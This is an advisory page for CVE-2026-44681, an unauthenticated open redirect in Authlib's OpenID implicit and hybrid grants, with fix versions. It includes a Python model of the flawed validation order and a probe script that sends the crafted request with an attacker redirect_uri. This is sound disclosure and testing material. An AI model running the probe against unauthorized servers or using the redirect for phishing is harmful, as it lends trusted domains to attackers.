CVE-2026-44681
Open Redirect vulnerability in authlib (PyPI)
What is CVE-2026-44681 About?
This vulnerability in Authlib's `OpenIDImplicitGrant` and `OpenIDHybridGrant` authorization endpoints allows an unauthenticated open redirect. By omitting the `openid` scope from an authorization request, an attacker can make the authorization server issue a 302 redirect to an attacker-chosen URL. The flaw lives in the server's authorization endpoint, but its effect is on the victim's browser: it primarily enables phishing by lending the OIDC provider's trusted domain to the attacker's destination.
Affected Software
- authlib
- >=1.7.0, <1.7.1
- <1.6.12
Technical Details
Authlib's `OpenIDImplicitGrant` and `OpenIDHybridGrant` authorization endpoints are vulnerable to an unauthenticated open redirect. The core issue is validation order: both grants check for the presence of the `openid` scope before validating `redirect_uri` against the client's registered URIs.

If an authorization request omits the `openid` scope, an `InvalidScopeError` is raised that carries the attacker-controlled `self.request.payload.redirect_uri`. `OAuth2Error.__call__` then treats any error with a non-empty `redirect_uri` as an instruction to issue an HTTP 302 redirect to that unsanitized URI.

An unauthenticated attacker can therefore supply an arbitrary `redirect_uri` in a malformed request (a `response_type` handled by one of these grants, with `openid` omitted from `scope`) and cause the trusted authorization server to redirect a victim's browser to an attacker-chosen URL. The early error path bypasses `AuthorizationEndpointMixin.validate_authorization_redirect_uri`, the check that normally prevents such redirects.
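To make the validation-order problem concrete, here is an added, stdlib-only model of the error path described above. It is not Authlib's code: `Client`, `OAuth2Error`, `validate_vulnerable`, `validate_fixed` and `authorize` are simplified stand-ins for the Authlib pieces the advisory names, the registered client and the attacker request are constructed for the example, and the only behaviour it reproduces is the one the advisory describes (an error object that carries a `redirect_uri` renders as a 302 to it). The vulnerable validator checks scope first; the hardened one resolves the client and validates `redirect_uri` before any error is allowed to redirect.

```python
# Added example, not Authlib's own code: a stdlib-only model of the validation
# order behind CVE-2026-44681. Class and function names are simplified
# stand-ins for the Authlib pieces named in the advisory.
import json
from urllib.parse import urlencode, urlsplit, urlunsplit


class Client:
    def __init__(self, client_id, redirect_uris):
        self.client_id = client_id
        self.redirect_uris = list(redirect_uris)


# Constructed client registration for the example.
CLIENTS = {"app": Client("app", ["https://app.example/cb"])}


def add_params_to_uri(uri, params, fragment=False):
    """Append params to the query (default) or the fragment of uri."""
    parts = urlsplit(uri)
    encoded = urlencode(params)
    if fragment:
        new = f"{parts.fragment}&{encoded}" if parts.fragment else encoded
        return urlunsplit(parts._replace(fragment=new))
    new = f"{parts.query}&{encoded}" if parts.query else encoded
    return urlunsplit(parts._replace(query=new))


class OAuth2Error(Exception):
    def __init__(self, error, description="", redirect_uri=None, redirect_fragment=False):
        super().__init__(description)
        self.error = error
        self.description = description
        self.redirect_uri = redirect_uri
        self.redirect_fragment = redirect_fragment

    def __call__(self):
        """Render as (status, body, headers). As the advisory describes, any
        non-empty redirect_uri becomes a 302 Location with no further check
        of where it points; otherwise the error is returned as a 400."""
        payload = {"error": self.error, "error_description": self.description}
        if self.redirect_uri:
            loc = add_params_to_uri(self.redirect_uri, payload, self.redirect_fragment)
            return 302, "", [("Location", loc)]
        return 400, json.dumps(payload), [("Content-Type", "application/json")]


def has_openid_scope(params):
    return "openid" in params.get("scope", "").split()


def validate_redirect_uri(params, client):
    """Only a URI registered for a known client may receive a redirect."""
    if client is None:
        raise OAuth2Error("invalid_client", "unknown client_id")
    uri = params.get("redirect_uri")
    if uri not in client.redirect_uris:
        raise OAuth2Error("invalid_request", "redirect_uri is not registered")
    return uri


def validate_vulnerable(params):
    """Vulnerable order: the scope check runs first, so the error is built
    from the raw request redirect_uri before anyone has validated it."""
    if not has_openid_scope(params):
        raise OAuth2Error("invalid_scope", "Missing 'openid' scope",
                          redirect_uri=params.get("redirect_uri"), redirect_fragment=True)
    client = CLIENTS.get(params.get("client_id"))
    return validate_redirect_uri(params, client)


def validate_fixed(params):
    """Hardened order: resolve the client and validate redirect_uri first.
    The scope error may then redirect, because its target is a registered URI."""
    client = CLIENTS.get(params.get("client_id"))
    redirect_uri = validate_redirect_uri(params, client)
    if not has_openid_scope(params):
        raise OAuth2Error("invalid_scope", "Missing 'openid' scope",
                          redirect_uri=redirect_uri, redirect_fragment=True)
    return redirect_uri


def authorize(params, validator):
    """Emulates the authorization endpoint's error handling: a validation
    error is rendered by calling the error object."""
    try:
        validator(params)
    except OAuth2Error as err:
        return err()
    return 200, "consent page", []


# Constructed attacker request: unknown client_id, no 'openid' scope,
# arbitrary redirect_uri.
ATTACK = {
    "response_type": "id_token",
    "client_id": "does-not-exist",
    "redirect_uri": "https://evil.example/",
    "scope": "profile",
    "nonce": "abc",
}

if __name__ == "__main__":
    for name, validator in (("vulnerable", validate_vulnerable), ("fixed", validate_fixed)):
        status, _, headers = authorize(ATTACK, validator)
        print(name, status, dict(headers).get("Location"))
```

Run stand-alone, the vulnerable validator answers the attacker request with a 302 whose Location is `https://evil.example/#error=invalid_scope&...`, while the fixed validator answers 400 because the client is unknown. The fixed order still redirects a legitimate client with a missing scope, but only to a registered `redirect_uri`, which is the behaviour OIDC expects.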
What is the Impact of CVE-2026-44681?
Successful exploitation may allow attackers to conduct phishing campaigns by redirecting victims from a trusted authorization server domain to an attacker-controlled URL, lending credibility to the malicious site.
What is the Exploitability of CVE-2026-44681?
Exploitation is straightforward and remote: it requires no authentication, no valid session, and not even a valid client_id. An attacker only needs to send a crafted GET request to the /oauth/authorize endpoint with a response_type handled by OpenIDImplicitGrant or OpenIDHybridGrant (e.g., id_token or code id_token), a scope that does not contain openid, and an arbitrary redirect_uri. The absence of openid in the scope triggers the early error path, which then uses the unvalidated redirect_uri for the redirect. The simplicity of the request and the lack of prerequisites make this vulnerability a high risk for phishing attacks.
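The following is an added example, not code from the advisory or from Authlib, for confirming exposure on a server you are authorized to test. It builds the crafted request described above and triages the answer: a redirect whose Location host is outside the provider's own hosts is the open redirect; a 400, or a redirect that stays on the provider (for example to its login page), is not. The hostnames, the `probe` client_id and the sample responses are constructed for the example; `fetch` uses only the standard library and is the one piece that talks to a network.

```python
# Added example, not Authlib's or the advisory's code: build the crafted
# authorization request for CVE-2026-44681 and triage the server's answer.
# Hostnames and sample responses are constructed for illustration.
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def build_probe_url(authorize_url, attacker_uri, response_type="id_token"):
    """Request routed to the OpenID implicit/hybrid grant by response_type
    ("id_token" or "code id_token") that omits 'openid' from scope."""
    params = {
        "response_type": response_type,
        "client_id": "probe",            # need not be registered on the server
        "redirect_uri": attacker_uri,    # a 302 must never land here
        "scope": "profile",              # deliberately no 'openid'
        "state": "cve-2026-44681-probe",
        "nonce": "probe-nonce",
    }
    return f"{authorize_url}?{urlencode(params)}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so Location can be inspected."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url):
    """Return (status, headers) for a GET without following redirects.
    urllib surfaces the unfollowed 3xx as an HTTPError, so both paths are handled."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, list(resp.headers.items())
    except urllib.error.HTTPError as err:
        return err.code, list(err.headers.items())


def classify_response(status, headers, trusted_hosts):
    """Return (verdict, detail). 'vulnerable' means the server redirected to
    a host outside trusted_hosts; an on-host or relative redirect is 'safe'."""
    if status not in REDIRECT_STATUSES:
        return "safe", f"no redirect (HTTP {status})"
    location = next((v for k, v in headers if k.lower() == "location"), None)
    if not location:
        return "inconclusive", "redirect status without a Location header"
    parts = urlsplit(location)
    if parts.hostname is None:
        return "safe", f"relative redirect to {location}"
    host = parts.hostname.lower()
    # The advisory's error path puts error=invalid_scope in the fragment
    # (redirect_fragment=True); check the query too for other modes.
    error = parse_qs(parts.fragment).get("error") or parse_qs(parts.query).get("error")
    detail = f"Location host {host}" + (f", error={error[0]}" if error else "")
    if host in {h.lower() for h in trusted_hosts}:
        return "safe", detail
    return "vulnerable", detail


if __name__ == "__main__":
    import sys

    # usage: probe.py https://idp.example/oauth/authorize https://evil.example/
    authorize_url, attacker_uri = sys.argv[1], sys.argv[2]
    trusted = {urlsplit(authorize_url).hostname}
    for response_type in ("id_token", "code id_token"):
        status, headers = fetch(build_probe_url(authorize_url, attacker_uri, response_type))
        print(response_type, *classify_response(status, headers, trusted))
```

Test both response_type values, since the implicit and hybrid grants are separate classes. Treat only an off-host Location as confirmation; a provider that redirects to its own login page before validating anything will also answer 302, which `classify_response` reports as safe.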
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for CVE-2026-44681?
Available Upgrade Options
- authlib
- <1.6.12 → Upgrade to 1.6.12
- >=1.7.0, <1.7.1 → Upgrade to 1.7.1
Additional Resources
What are Similar Vulnerabilities to CVE-2026-44681?
Similar Vulnerabilities: CVE-2021-29505, CVE-2020-15167, CVE-2019-15891, CVE-2018-1000635, CVE-2017-1000486
